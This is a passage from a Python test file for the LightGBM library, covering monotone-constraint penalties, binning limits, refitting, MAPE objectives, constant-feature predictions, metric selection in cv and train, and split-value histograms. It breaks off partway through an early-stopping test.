        # True if no split on a monotone-constrained feature occurs in
        # the first `depth_left` levels at or below `node`.
        if depth_left <= 0:
            return True
        if "leaf_value" in node:
            return True
        if constraints[node["split_feature"]] != 0:
            return False
        return (no_monotone_splits_above(node["left_child"], depth_left - 1, constraints)
                and no_monotone_splits_above(node["right_child"], depth_left - 1, constraints))

    def contains_monotone_split(node, constraints):
        # True if any split anywhere in the subtree uses a constrained feature.
        if "leaf_value" in node:
            return False
        if constraints[node["split_feature"]] != 0:
            return True
        return (contains_monotone_split(node["left_child"], constraints)
                or contains_monotone_split(node["right_child"], constraints))

    max_depth = 5
    monotone_constraints = [1, -1, 0]
    penalization_parameter = 2.0
    trainset = generate_trainset_for_monotone_constraints_tests(x3_to_category=False)
    for method in ["basic", "intermediate", "advanced"]:
        params = {
            'max_depth': max_depth,
            'monotone_constraints': monotone_constraints,
            'monotone_penalty': penalization_parameter,
            "monotone_constraints_method": method,
        }
        model = lgb.train(params, trainset, 10)
        for tree in model.dump_model()["tree_info"]:
            root = tree["tree_structure"]
            assert no_monotone_splits_above(root, int(penalization_parameter), monotone_constraints)
            assert contains_monotone_split(root, monotone_constraints)
def test_monotone_penalty_max():
    """A monotone-splits penalty as high as max_depth must prohibit all
    monotone splits, so the model must be identical to one trained on
    the unconstrained feature alone."""
    max_depth = 5
    monotone_constraints = [1, -1, 0]
    penalty = max_depth
    constrained_trainset = generate_trainset_for_monotone_constraints_tests(x3_to_category=False)
    x = constrained_trainset.data
    y = constrained_trainset.label
    x3_only = x[:, 2]
    unconstrained_trainset = lgb.Dataset(x3_only.reshape(-1, 1), label=y)
    constrained_params = {
        'monotone_constraints': monotone_constraints,
        'monotone_penalty': penalty,
        "max_depth": max_depth,
        "gpu_use_dp": True,
    }
    unconstrained_params = {
        "max_depth": max_depth,
        "gpu_use_dp": True,
    }
    reference_model = lgb.train(unconstrained_params, unconstrained_trainset, 10)
    reference_predictions = reference_model.predict(x3_only.reshape(-1, 1))
    for method in ["basic", "intermediate", "advanced"]:
        constrained_params["monotone_constraints_method"] = method
        # The penalization is so high that the first 2 features should not be used here
        constrained_model = lgb.train(constrained_params, constrained_trainset, 10)
        # Check that a very high penalization is the same as not using the features at all
        np.testing.assert_array_equal(constrained_model.predict(x), reference_predictions)
def test_max_bin_by_feature():
    """`max_bin_by_feature` must cap binning per feature, which limits
    how many distinct predictions a single tree can produce."""
    first_col = np.arange(0, 100)[:, np.newaxis]
    second_col = np.zeros((100, 1))
    second_col[20:] = 1
    X = np.concatenate([first_col, second_col], axis=1)
    y = np.arange(0, 100)
    params = {
        'objective': 'regression_l2',
        'verbose': -1,
        'num_leaves': 100,
        'min_data_in_leaf': 1,
        'min_sum_hessian_in_leaf': 0,
        'min_data_in_bin': 1,
        'max_bin_by_feature': [100, 2]
    }

    def n_unique_predictions():
        booster = lgb.train(params, lgb.Dataset(X, label=y), num_boost_round=1)
        return len(np.unique(booster.predict(X)))

    # 100 bins on the informative first feature: every row separable.
    assert n_unique_predictions() == 100
    # Only 2 bins on the first feature: predictions collapse to 3 values.
    params['max_bin_by_feature'] = [2, 100]
    assert n_unique_predictions() == 3
def test_small_max_bin():
    """Training must succeed with very small `max_bin` values, with and
    without NaN present in the data."""
    np.random.seed(0)
    labels = np.random.choice([0, 1], 100)
    features = np.ones((100, 1))
    features[:30, 0] = -1
    features[60:, 0] = 2
    params = {'objective': 'binary',
              'seed': 0,
              'min_data_in_leaf': 1,
              'verbose': -1,
              'max_bin': 2}
    lgb.train(params, lgb.Dataset(features, label=labels), num_boost_round=5)
    # Introduce a NaN and allow one more bin for it.
    features[0, 0] = np.nan
    params['max_bin'] = 3
    lgb.train(params, lgb.Dataset(features, label=labels), num_boost_round=5)
    np.random.seed()  # reset seed
def test_refit():
    """Refitting a trained booster on held-out data must reduce its loss
    on that data."""
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'verbose': -1,
        'min_data': 10
    }
    booster = lgb.train(params, lgb.Dataset(X_train, y_train), num_boost_round=20)
    loss_before = log_loss(y_test, booster.predict(X_test))
    refitted = booster.refit(X_test, y_test)
    loss_after = log_loss(y_test, refitted.predict(X_test))
    assert loss_before > loss_after
def test_mape_rf():
    """MAPE objective with random-forest boosting and
    boost_from_average=True must not collapse predictions toward zero."""
    X, y = load_boston(return_X_y=True)
    params = {
        'boosting_type': 'rf',
        'objective': 'mape',
        'verbose': -1,
        'bagging_freq': 1,
        'bagging_fraction': 0.8,
        'feature_fraction': 0.8,
        'boost_from_average': True
    }
    booster = lgb.train(params, lgb.Dataset(X, y), num_boost_round=20)
    assert booster.predict(X).mean() > 20
def test_mape_dart():
    """MAPE objective with DART boosting and boost_from_average=False
    must still produce predictions of a sensible magnitude."""
    X, y = load_boston(return_X_y=True)
    params = {
        'boosting_type': 'dart',
        'objective': 'mape',
        'verbose': -1,
        'bagging_freq': 1,
        'bagging_fraction': 0.8,
        'feature_fraction': 0.8,
        'boost_from_average': False
    }
    booster = lgb.train(params, lgb.Dataset(X, y), num_boost_round=40)
    assert booster.predict(X).mean() > 18
def check_constant_features(y_true, expected_pred, more_params):
    """Train on a single constant feature and assert that every
    prediction equals `expected_pred` (the objective-specific average
    of `y_true`). Extra/overriding params come from `more_params`."""
    n = len(y_true)
    X_train = np.ones((n, 1))
    y_train = np.array(y_true)
    params = {
        'objective': 'regression',
        'num_class': 1,
        'verbose': -1,
        'min_data': 1,
        'num_leaves': 2,
        'learning_rate': 1,
        'min_data_in_bin': 1,
        'boost_from_average': True
    }
    params.update(more_params)
    booster = lgb.train(params, lgb.Dataset(X_train, y_train, params=params), num_boost_round=2)
    assert np.allclose(booster.predict(X_train), expected_pred)
def test_constant_features_regression():
    """With a constant feature, regression must predict the label mean."""
    params = {'objective': 'regression'}
    for labels, expected in [([0.0, 10.0, 0.0, 10.0], 5.0),
                             ([0.0, 1.0, 2.0, 3.0], 1.5),
                             ([-1.0, 1.0, -2.0, 2.0], 0.0)]:
        check_constant_features(labels, expected, params)
def test_constant_features_binary():
    """With a constant feature, the binary objective must predict the
    positive-label rate."""
    params = {'objective': 'binary'}
    for labels, expected in [([0.0, 10.0, 0.0, 10.0], 0.5),
                             ([0.0, 1.0, 2.0, 3.0], 0.75)]:
        check_constant_features(labels, expected, params)
def test_constant_features_multiclass():
    """With a constant feature, multiclass softmax must predict the
    empirical class frequencies."""
    params = {'objective': 'multiclass', 'num_class': 3}
    for labels, expected in [([0.0, 1.0, 2.0, 0.0], [0.5, 0.25, 0.25]),
                             ([0.0, 1.0, 2.0, 1.0], [0.25, 0.5, 0.25])]:
        check_constant_features(labels, expected, params)
def test_constant_features_multiclassova():
    """With a constant feature, one-vs-all multiclass must predict the
    empirical class frequencies."""
    params = {'objective': 'multiclassova', 'num_class': 3}
    for labels, expected in [([0.0, 1.0, 2.0, 0.0], [0.5, 0.25, 0.25]),
                             ([0.0, 1.0, 2.0, 1.0], [0.25, 0.5, 0.25])]:
        check_constant_features(labels, expected, params)
def test_fpreproc():
    """`fpreproc` must be able to rewrite the train/valid Datasets and
    the params of each CV fold before training starts."""
    def preprocess_data(dtrain, dtest, params):
        # Shift the first feature, relabel the last 5 rows to a new
        # class, and rebuild both Datasets with an extra class in params.
        train_data = dtrain.construct().get_data()
        test_data = dtest.construct().get_data()
        train_data[:, 0] += 1
        test_data[:, 0] += 1
        dtrain.label[-5:] = 3
        dtest.label[-5:] = 3
        dtrain = lgb.Dataset(train_data, dtrain.label)
        dtest = lgb.Dataset(test_data, dtest.label, reference=dtrain)
        params['num_class'] = 4
        return dtrain, dtest, params

    X, y = load_iris(return_X_y=True)
    dataset = lgb.Dataset(X, y, free_raw_data=False)
    cv_results = lgb.cv({'objective': 'multiclass', 'num_class': 3, 'verbose': -1},
                        dataset, num_boost_round=10, fpreproc=preprocess_data)
    assert 'multi_logloss-mean' in cv_results
    assert len(cv_results['multi_logloss-mean']) == 10
def test_metrics():
    """Exhaustively check which metrics lgb.cv / lgb.train report for
    every combination of: metric in params vs. in args, custom objective
    (fobj), custom metric (feval), 'None' aliases that disable default
    metrics, and multiclass objective aliases.

    NOTE(review): `evals_result` is a single dict shared by all
    `train_booster` calls; lgb.train appears to overwrite it on each
    call (the `== 0` checks after training rely on that) — the
    expectations below are order-dependent.
    """
    X, y = load_digits(n_class=2, return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    lgb_train = lgb.Dataset(X_train, y_train, silent=True)
    lgb_valid = lgb.Dataset(X_test, y_test, reference=lgb_train, silent=True)
    evals_result = {}
    # Parameter dicts covering every metric/objective combination used below.
    params_verbose = {'verbose': -1}
    params_obj_verbose = {'objective': 'binary', 'verbose': -1}
    params_obj_metric_log_verbose = {'objective': 'binary', 'metric': 'binary_logloss', 'verbose': -1}
    params_obj_metric_err_verbose = {'objective': 'binary', 'metric': 'binary_error', 'verbose': -1}
    params_obj_metric_inv_verbose = {'objective': 'binary', 'metric': 'invalid_metric', 'verbose': -1}
    params_obj_metric_multi_verbose = {'objective': 'binary',
                                       'metric': ['binary_logloss', 'binary_error'],
                                       'verbose': -1}
    params_obj_metric_none_verbose = {'objective': 'binary', 'metric': 'None', 'verbose': -1}
    params_metric_log_verbose = {'metric': 'binary_logloss', 'verbose': -1}
    params_metric_err_verbose = {'metric': 'binary_error', 'verbose': -1}
    params_metric_inv_verbose = {'metric_types': 'invalid_metric', 'verbose': -1}
    params_metric_multi_verbose = {'metric': ['binary_logloss', 'binary_error'], 'verbose': -1}
    params_metric_none_verbose = {'metric': 'None', 'verbose': -1}

    def get_cv_result(params=params_obj_verbose, **kwargs):
        # Thin wrapper: 2-round CV on the shared train set.
        return lgb.cv(params, lgb_train, num_boost_round=2, verbose_eval=False, **kwargs)

    def train_booster(params=params_obj_verbose, **kwargs):
        # Thin wrapper: 2-round training recording into the shared evals_result.
        lgb.train(params, lgb_train,
                  num_boost_round=2,
                  valid_sets=[lgb_valid],
                  evals_result=evals_result,
                  verbose_eval=False, **kwargs)

    # First: the full case matrix through lgb.cv (res holds mean+stdv per metric,
    # hence the even lengths: 2 entries per reported metric).
    # no fobj, no feval
    # default metric
    res = get_cv_result()
    assert len(res) == 2
    assert 'binary_logloss-mean' in res
    # non-default metric in params
    res = get_cv_result(params=params_obj_metric_err_verbose)
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # default metric in args
    res = get_cv_result(metrics='binary_logloss')
    assert len(res) == 2
    assert 'binary_logloss-mean' in res
    # non-default metric in args
    res = get_cv_result(metrics='binary_error')
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # metric in args overwrites one in params
    res = get_cv_result(params=params_obj_metric_inv_verbose, metrics='binary_error')
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # multiple metrics in params
    res = get_cv_result(params=params_obj_metric_multi_verbose)
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    # multiple metrics in args
    res = get_cv_result(metrics=['binary_logloss', 'binary_error'])
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    # remove default metric by 'None' in list
    res = get_cv_result(metrics=['None'])
    assert len(res) == 0
    # remove default metric by 'None' aliases
    for na_alias in ('None', 'na', 'null', 'custom'):
        res = get_cv_result(metrics=na_alias)
        assert len(res) == 0
    # fobj, no feval
    # no default metric
    res = get_cv_result(params=params_verbose, fobj=dummy_obj)
    assert len(res) == 0
    # metric in params
    res = get_cv_result(params=params_metric_err_verbose, fobj=dummy_obj)
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # metric in args
    res = get_cv_result(params=params_verbose, fobj=dummy_obj, metrics='binary_error')
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # metric in args overwrites its' alias in params
    res = get_cv_result(params=params_metric_inv_verbose, fobj=dummy_obj, metrics='binary_error')
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # multiple metrics in params
    res = get_cv_result(params=params_metric_multi_verbose, fobj=dummy_obj)
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    # multiple metrics in args
    res = get_cv_result(params=params_verbose, fobj=dummy_obj,
                        metrics=['binary_logloss', 'binary_error'])
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    # no fobj, feval
    # default metric with custom one
    res = get_cv_result(feval=constant_metric)
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'error-mean' in res
    # non-default metric in params with custom one
    res = get_cv_result(params=params_obj_metric_err_verbose, feval=constant_metric)
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # default metric in args with custom one
    res = get_cv_result(metrics='binary_logloss', feval=constant_metric)
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'error-mean' in res
    # non-default metric in args with custom one
    res = get_cv_result(metrics='binary_error', feval=constant_metric)
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # metric in args overwrites one in params, custom one is evaluated too
    res = get_cv_result(params=params_obj_metric_inv_verbose, metrics='binary_error', feval=constant_metric)
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # multiple metrics in params with custom one
    res = get_cv_result(params=params_obj_metric_multi_verbose, feval=constant_metric)
    assert len(res) == 6
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # multiple metrics in args with custom one
    res = get_cv_result(metrics=['binary_logloss', 'binary_error'], feval=constant_metric)
    assert len(res) == 6
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # custom metric is evaluated despite 'None' is passed
    res = get_cv_result(metrics=['None'], feval=constant_metric)
    assert len(res) == 2
    assert 'error-mean' in res
    # fobj, feval
    # no default metric, only custom one
    res = get_cv_result(params=params_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(res) == 2
    assert 'error-mean' in res
    # metric in params with custom one
    res = get_cv_result(params=params_metric_err_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # metric in args with custom one
    res = get_cv_result(params=params_verbose, fobj=dummy_obj,
                        feval=constant_metric, metrics='binary_error')
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # metric in args overwrites one in params, custom one is evaluated too
    res = get_cv_result(params=params_metric_inv_verbose, fobj=dummy_obj,
                        feval=constant_metric, metrics='binary_error')
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # multiple metrics in params with custom one
    res = get_cv_result(params=params_metric_multi_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(res) == 6
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # multiple metrics in args with custom one
    res = get_cv_result(params=params_verbose, fobj=dummy_obj, feval=constant_metric,
                        metrics=['binary_logloss', 'binary_error'])
    assert len(res) == 6
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # custom metric is evaluated despite 'None' is passed
    res = get_cv_result(params=params_metric_none_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(res) == 2
    assert 'error-mean' in res
    # Second: the same case matrix through lgb.train into evals_result.
    # no fobj, no feval
    # default metric
    train_booster()
    assert len(evals_result['valid_0']) == 1
    assert 'binary_logloss' in evals_result['valid_0']
    # default metric in params
    train_booster(params=params_obj_metric_log_verbose)
    assert len(evals_result['valid_0']) == 1
    assert 'binary_logloss' in evals_result['valid_0']
    # non-default metric in params
    train_booster(params=params_obj_metric_err_verbose)
    assert len(evals_result['valid_0']) == 1
    assert 'binary_error' in evals_result['valid_0']
    # multiple metrics in params
    train_booster(params=params_obj_metric_multi_verbose)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'binary_error' in evals_result['valid_0']
    # remove default metric by 'None' aliases
    for na_alias in ('None', 'na', 'null', 'custom'):
        params = {'objective': 'binary', 'metric': na_alias, 'verbose': -1}
        train_booster(params=params)
        assert len(evals_result) == 0
    # fobj, no feval
    # no default metric
    train_booster(params=params_verbose, fobj=dummy_obj)
    assert len(evals_result) == 0
    # metric in params
    train_booster(params=params_metric_log_verbose, fobj=dummy_obj)
    assert len(evals_result['valid_0']) == 1
    assert 'binary_logloss' in evals_result['valid_0']
    # multiple metrics in params
    train_booster(params=params_metric_multi_verbose, fobj=dummy_obj)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'binary_error' in evals_result['valid_0']
    # no fobj, feval
    # default metric with custom one
    train_booster(feval=constant_metric)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # default metric in params with custom one
    train_booster(params=params_obj_metric_log_verbose, feval=constant_metric)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # non-default metric in params with custom one
    train_booster(params=params_obj_metric_err_verbose, feval=constant_metric)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_error' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # multiple metrics in params with custom one
    train_booster(params=params_obj_metric_multi_verbose, feval=constant_metric)
    assert len(evals_result['valid_0']) == 3
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'binary_error' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # custom metric is evaluated despite 'None' is passed
    train_booster(params=params_obj_metric_none_verbose, feval=constant_metric)
    assert len(evals_result) == 1
    assert 'error' in evals_result['valid_0']
    # fobj, feval
    # no default metric, only custom one
    train_booster(params=params_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(evals_result['valid_0']) == 1
    assert 'error' in evals_result['valid_0']
    # metric in params with custom one
    train_booster(params=params_metric_log_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # multiple metrics in params with custom one
    train_booster(params=params_metric_multi_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(evals_result['valid_0']) == 3
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'binary_error' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # custom metric is evaluated despite 'None' is passed
    train_booster(params=params_metric_none_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(evals_result) == 1
    assert 'error' in evals_result['valid_0']
    # Third: multiclass — every objective alias must behave consistently.
    X, y = load_digits(n_class=3, return_X_y=True)
    lgb_train = lgb.Dataset(X, y, silent=True)
    obj_multi_aliases = ['multiclass', 'softmax', 'multiclassova', 'multiclass_ova', 'ova', 'ovr']
    for obj_multi_alias in obj_multi_aliases:
        params_obj_class_3_verbose = {'objective': obj_multi_alias, 'num_class': 3, 'verbose': -1}
        params_obj_class_1_verbose = {'objective': obj_multi_alias, 'num_class': 1, 'verbose': -1}
        params_obj_verbose = {'objective': obj_multi_alias, 'verbose': -1}
        # multiclass default metric
        res = get_cv_result(params_obj_class_3_verbose)
        assert len(res) == 2
        assert 'multi_logloss-mean' in res
        # multiclass default metric with custom one
        res = get_cv_result(params_obj_class_3_verbose, feval=constant_metric)
        assert len(res) == 4
        assert 'multi_logloss-mean' in res
        assert 'error-mean' in res
        # multiclass metric alias with custom one for custom objective
        res = get_cv_result(params_obj_class_3_verbose, fobj=dummy_obj, feval=constant_metric)
        assert len(res) == 2
        assert 'error-mean' in res
        # no metric for invalid class_num
        res = get_cv_result(params_obj_class_1_verbose, fobj=dummy_obj)
        assert len(res) == 0
        # custom metric for invalid class_num
        res = get_cv_result(params_obj_class_1_verbose, fobj=dummy_obj, feval=constant_metric)
        assert len(res) == 2
        assert 'error-mean' in res
        # multiclass metric alias with custom one with invalid class_num
        with pytest.raises(lgb.basic.LightGBMError):
            get_cv_result(params_obj_class_1_verbose, metrics=obj_multi_alias,
                          fobj=dummy_obj, feval=constant_metric)
        # multiclass default metric without num_class
        with pytest.raises(lgb.basic.LightGBMError):
            get_cv_result(params_obj_verbose)
        for metric_multi_alias in obj_multi_aliases + ['multi_logloss']:
            # multiclass metric alias
            res = get_cv_result(params_obj_class_3_verbose, metrics=metric_multi_alias)
            assert len(res) == 2
            assert 'multi_logloss-mean' in res
        # multiclass metric
        res = get_cv_result(params_obj_class_3_verbose, metrics='multi_error')
        assert len(res) == 2
        assert 'multi_error-mean' in res
        # non-valid metric for multiclass objective
        with pytest.raises(lgb.basic.LightGBMError):
            get_cv_result(params_obj_class_3_verbose, metrics='binary_logloss')
    params_class_3_verbose = {'num_class': 3, 'verbose': -1}
    # non-default num_class for default objective
    with pytest.raises(lgb.basic.LightGBMError):
        get_cv_result(params_class_3_verbose)
    # no metric with non-default num_class for custom objective
    res = get_cv_result(params_class_3_verbose, fobj=dummy_obj)
    assert len(res) == 0
    for metric_multi_alias in obj_multi_aliases + ['multi_logloss']:
        # multiclass metric alias for custom objective
        res = get_cv_result(params_class_3_verbose, metrics=metric_multi_alias, fobj=dummy_obj)
        assert len(res) == 2
        assert 'multi_logloss-mean' in res
    # multiclass metric for custom objective
    res = get_cv_result(params_class_3_verbose, metrics='multi_error', fobj=dummy_obj)
    assert len(res) == 2
    assert 'multi_error-mean' in res
    # binary metric with non-default num_class for custom objective
    with pytest.raises(lgb.basic.LightGBMError):
        get_cv_result(params_class_3_verbose, metrics='binary_error', fobj=dummy_obj)
def test_multiple_feval_train():
    """Passing a list of custom eval functions to lgb.train must record
    each of them alongside the built-in metric."""
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_validation, y_train, y_validation = train_test_split(X, y, test_size=0.2)
    train_dataset = lgb.Dataset(data=X_train, label=y_train, silent=True)
    validation_dataset = lgb.Dataset(data=X_validation, label=y_validation,
                                     reference=train_dataset, silent=True)
    evals_result = {}
    lgb.train(
        params={'verbose': -1, 'objective': 'binary', 'metric': 'binary_logloss'},
        train_set=train_dataset,
        valid_sets=validation_dataset,
        num_boost_round=5,
        feval=[constant_metric, decreasing_metric],
        evals_result=evals_result)
    recorded = evals_result['valid_0']
    assert len(recorded) == 3
    assert 'binary_logloss' in recorded
    assert 'error' in recorded
    assert 'decreasing_metric' in recorded
def test_multiple_feval_cv():
    """lgb.cv must report mean and stdv for the built-in metric and for
    every custom eval function passed in a list."""
    X, y = load_breast_cancer(return_X_y=True)
    cv_results = lgb.cv(
        params={'verbose': -1, 'objective': 'binary', 'metric': 'binary_logloss'},
        train_set=lgb.Dataset(data=X, label=y, silent=True),
        num_boost_round=5,
        feval=[constant_metric, decreasing_metric])
    # Three metrics, each contributing a mean and a stdv entry.
    assert len(cv_results) == 6
    for metric in ('binary_logloss', 'error', 'decreasing_metric'):
        assert f'{metric}-mean' in cv_results
        assert f'{metric}-stdv' in cv_results
@pytest.mark.skipif(psutil.virtual_memory().available / 1024 / 1024 / 1024 < 3, reason='not enough RAM')
def test_model_size():
    """A model string longer than 2**31 characters must load correctly.

    Builds the oversized string by duplicating one tree 100 times and
    padding with spaces, then checks that it round-trips through
    model_from_string and predicts exactly like the 2-tree original.
    """
    X, y = load_boston(return_X_y=True)
    data = lgb.Dataset(X, y)
    bst = lgb.train({'verbose': -1}, data, num_boost_round=2)
    y_pred = bst.predict(X)
    model_str = bst.model_to_string()
    one_tree = model_str[model_str.find('Tree=1'):model_str.find('end of trees')]
    one_tree_size = len(one_tree)
    one_tree = one_tree.replace('Tree=1', 'Tree={}')
    multiplier = 100
    total_trees = multiplier + 2
    try:
        before_tree_sizes = model_str[:model_str.find('tree_sizes')]
        trees = model_str[model_str.find('Tree=0'):model_str.find('end of trees')]
        more_trees = (one_tree * multiplier).format(*range(2, total_trees))
        after_trees = model_str[model_str.find('end of trees'):]
        # Pad with spaces so the total length crosses the 2**31 mark.
        num_end_spaces = 2**31 - one_tree_size * total_trees
        padding = " " * num_end_spaces
        new_model_str = f"{before_tree_sizes}\n\n{trees}{more_trees}{after_trees}{padding}"
        assert len(new_model_str) > 2**31
        bst.model_from_string(new_model_str, verbose=False)
        assert bst.num_trees() == total_trees
        y_pred_new = bst.predict(X, num_iteration=2)
        np.testing.assert_allclose(y_pred, y_pred_new)
    except MemoryError:
        # BUG FIX: this used to call pytest.skipTest(), which does not
        # exist (skipTest is a unittest.TestCase method) and so raised
        # AttributeError instead of skipping the test.
        pytest.skip('not enough RAM')
def test_get_split_value_histogram():
    """Check get_split_value_histogram: the `bins` and `xgboost_style`
    options, interchangeability of feature index and feature name, the
    NumPy-style (hist, bin_edges) return, and rejection of categorical
    features."""
    X, y = load_boston(return_X_y=True)
    lgb_train = lgb.Dataset(X, y, categorical_feature=[2])
    gbm = lgb.train({'verbose': -1}, lgb_train, num_boost_round=20)
    # test XGBoost-style return value
    params = {'feature': 0, 'xgboost_style': True}
    # Feature 0 evidently has 9 distinct split values in this model:
    # bins larger than that (999) still yield 9 rows, smaller bins clip.
    assert gbm.get_split_value_histogram(**params).shape == (9, 2)
    assert gbm.get_split_value_histogram(bins=999, **params).shape == (9, 2)
    assert gbm.get_split_value_histogram(bins=-1, **params).shape == (1, 2)
    assert gbm.get_split_value_histogram(bins=0, **params).shape == (1, 2)
    assert gbm.get_split_value_histogram(bins=1, **params).shape == (1, 2)
    assert gbm.get_split_value_histogram(bins=2, **params).shape == (2, 2)
    assert gbm.get_split_value_histogram(bins=6, **params).shape == (5, 2)
    assert gbm.get_split_value_histogram(bins=7, **params).shape == (6, 2)
    # Feature index and feature name must give identical results
    # (a DataFrame when pandas is installed, an ndarray otherwise).
    if lgb.compat.PANDAS_INSTALLED:
        np.testing.assert_allclose(
            gbm.get_split_value_histogram(0, xgboost_style=True).values,
            gbm.get_split_value_histogram(gbm.feature_name()[0], xgboost_style=True).values
        )
        np.testing.assert_allclose(
            gbm.get_split_value_histogram(X.shape[-1] - 1, xgboost_style=True).values,
            gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1], xgboost_style=True).values
        )
    else:
        np.testing.assert_allclose(
            gbm.get_split_value_histogram(0, xgboost_style=True),
            gbm.get_split_value_histogram(gbm.feature_name()[0], xgboost_style=True)
        )
        np.testing.assert_allclose(
            gbm.get_split_value_histogram(X.shape[-1] - 1, xgboost_style=True),
            gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1], xgboost_style=True)
        )
    # test numpy-style return value
    hist, bins = gbm.get_split_value_histogram(0)
    assert len(hist) == 23
    assert len(bins) == 24
    hist, bins = gbm.get_split_value_histogram(0, bins=999)
    assert len(hist) == 999
    assert len(bins) == 1000
    # Non-positive bin counts are rejected in NumPy style (unlike the
    # XGBoost style above, which clamps them to 1).
    with pytest.raises(ValueError):
        gbm.get_split_value_histogram(0, bins=-1)
    with pytest.raises(ValueError):
        gbm.get_split_value_histogram(0, bins=0)
    hist, bins = gbm.get_split_value_histogram(0, bins=1)
    assert len(hist) == 1
    assert len(bins) == 2
    hist, bins = gbm.get_split_value_histogram(0, bins=2)
    assert len(hist) == 2
    assert len(bins) == 3
    hist, bins = gbm.get_split_value_histogram(0, bins=6)
    assert len(hist) == 6
    assert len(bins) == 7
    hist, bins = gbm.get_split_value_histogram(0, bins=7)
    assert len(hist) == 7
    assert len(bins) == 8
    hist_idx, bins_idx = gbm.get_split_value_histogram(0)
    hist_name, bins_name = gbm.get_split_value_histogram(gbm.feature_name()[0])
    np.testing.assert_array_equal(hist_idx, hist_name)
    np.testing.assert_allclose(bins_idx, bins_name)
    hist_idx, bins_idx = gbm.get_split_value_histogram(X.shape[-1] - 1)
    hist_name, bins_name = gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1])
    np.testing.assert_array_equal(hist_idx, hist_name)
    np.testing.assert_allclose(bins_idx, bins_name)
    # test bins string type
    if np.__version__ > '1.11.0':
        hist_vals, bin_edges = gbm.get_split_value_histogram(0, bins='auto')
        hist = gbm.get_split_value_histogram(0, bins='auto', xgboost_style=True)
        # XGBoost style drops empty bins, so compare only non-zero ones.
        if lgb.compat.PANDAS_INSTALLED:
            mask = hist_vals > 0
            np.testing.assert_array_equal(hist_vals[mask], hist['Count'].values)
            np.testing.assert_allclose(bin_edges[1:][mask], hist['SplitValue'].values)
        else:
            mask = hist_vals > 0
            np.testing.assert_array_equal(hist_vals[mask], hist[:, 1])
            np.testing.assert_allclose(bin_edges[1:][mask], hist[:, 0])
    # test histogram is disabled for categorical features
    with pytest.raises(lgb.basic.LightGBMError):
        gbm.get_split_value_histogram(2)
def test_early_stopping_for_only_first_metric():
    """Check that ``first_metric_only`` makes early stopping track only the
    first metric supplied, for both ``lgb.train`` and ``lgb.cv``.

    The expected stopping iterations (``iter_*`` constants below) were
    determined empirically for the fixed seeds and parameters used here.
    """

    def metrics_combination_train_regression(valid_sets, metric_list, assumed_iteration,
                                             first_metric_only, feval=None):
        # Train with early stopping and assert it stopped at the expected round.
        params = {
            'objective': 'regression',
            'learning_rate': 1.1,
            'num_leaves': 10,
            'metric': metric_list,
            'verbose': -1,
            'seed': 123
        }
        gbm = lgb.train(dict(params, first_metric_only=first_metric_only), lgb_train,
                        num_boost_round=25, valid_sets=valid_sets, feval=feval,
                        early_stopping_rounds=5, verbose_eval=False)
        assert assumed_iteration == gbm.best_iteration

    def metrics_combination_cv_regression(metric_list, assumed_iteration,
                                          first_metric_only, eval_train_metric, feval=None):
        # Same check for lgb.cv: the number of recorded rounds equals the
        # iteration where early stopping kicked in.
        params = {
            'objective': 'regression',
            'learning_rate': 0.9,
            'num_leaves': 10,
